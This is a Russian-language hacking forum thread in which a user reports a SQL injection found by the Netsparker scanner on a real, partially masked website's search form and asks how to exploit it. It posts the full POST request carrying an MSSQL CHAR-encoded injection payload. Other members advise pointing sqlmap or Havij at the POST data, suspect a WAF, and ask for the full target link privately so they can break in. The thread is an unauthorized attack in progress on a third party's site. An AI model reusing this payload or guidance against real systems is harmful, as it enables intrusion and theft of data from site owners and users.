Здравствуйте. Нашел одним известным сканером уязвимость:

http://www.------.com/-/Search.htm

атакующий скрипт:

(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(6 4)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)% 2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FR OM+syscolumns)

Далее пробовал использовать havij и sqlmap, но ничего не получилось. Подскажите что нужно делать?

sodgam said:
↑ (https://antichat.live/posts/3941397/)
Здравствуйте. Нашел одним известным сканером уязвимость:
http://www.------.com/-/Search.htm
атакующий скрипт:
(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(6 4)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)% 2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FR OM+syscolumns)
Далее пробовал использовать havij и sqlmap, но ничего не получилось. Подскажите что нужно делать?


Кинь под хайд полный линк, попробую раскрутить

То что ты щас подписал атакующим скриптом это прога подставила для проверки

Тебе надо сократить правильно

sodgam said:
↑ (https://antichat.live/posts/3941397/)
Здравствуйте. Нашел одним известным сканером уязвимость:
http://www.------.com/-/Search.htm
атакующий скрипт:
(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(6 4)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)% 2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FR OM+syscolumns)
Далее пробовал использовать havij и sqlmap, но ничего не получилось. Подскажите что нужно делать?


ну ладно , смотри

http://www.------.com/-/Search.htm

из Search.htm видно что пост запрос, для этого тебе надо в хавидж или sqlmap дать сылку УРЛ http://www.------.com/-/Search.htm У казать что это пост запрос и указать данные которые отправляются. сканер не акунетикс?

(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(6 4)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)% 2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FR OM+syscolumns)

там скорее всего waf суда по данным которые закодированы чаром

BabaDook said:
↑ (https://antichat.live/posts/3941884/)
ну ладно , смотри
http://www.------.com/-/Search.htm
из Search.htm видно что пост запрос, для этого тебе надо в хавидж или sqlmap дать сылку УРЛ
http://www.------.com/-/Search.htm
У казать что это пост запрос и указать данные которые отправляются. сканер не акунетикс?
(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(6 4)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)% 2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FR OM+syscolumns)
там скорее всего waf суда по данным которые закодированы чаром


я так и делал, подставлял и полностью и частями, но не получилось. Сканер Netsparker

полный запрос выглядит так:

nameIn=Smith&sizeIn=3&pornstarID=(select+convert(int%2cCHAR(95)%2bCHAR(3 3)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2 bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bC HAR(97))+FROM+syscolumns)&priceIn=All&companyIn=All&fetishIn=3&searchKW=3&searchCT=3&SearchString=Fetish+Fantasy&toySort=date

MrScrudg said:
↑ (https://antichat.live/posts/3941779/)
Кинь под хайд полный линк, попробую раскрутить


кинул в личку

sodgam said:
↑ (https://antichat.live/posts/3942262/)
я так и делал, подставлял и полностью и частями, но не получилось. Сканер Netsparker
полный запрос выглядит так:
nameIn=Smith&sizeIn=3&pornstarID=(select+convert(int%2cCHAR(95)%2bCHAR(3 3)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2 bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bC HAR(97))+FROM+syscolumns)&priceIn=All&companyIn=All&fetishIn=3&searchKW=3&searchCT=3&SearchString=Fetish+Fantasy&toySort=date


мне тоже кинь

sodgam said:
↑ (https://antichat.live/posts/3942262/)
я так и делал, подставлял и полностью и частями, но не получилось. Сканер Netsparker
полный запрос выглядит так:
nameIn=Smith&sizeIn=3&pornstarID=(select+convert(int%2cCHAR(95)%2bCHAR(3 3)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2 bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bC HAR(97))+FROM+syscolumns)&priceIn=All&companyIn=All&fetishIn=3&searchKW=3&searchCT=3&SearchString=Fetish+Fantasy&toySort=date



Параметры классные )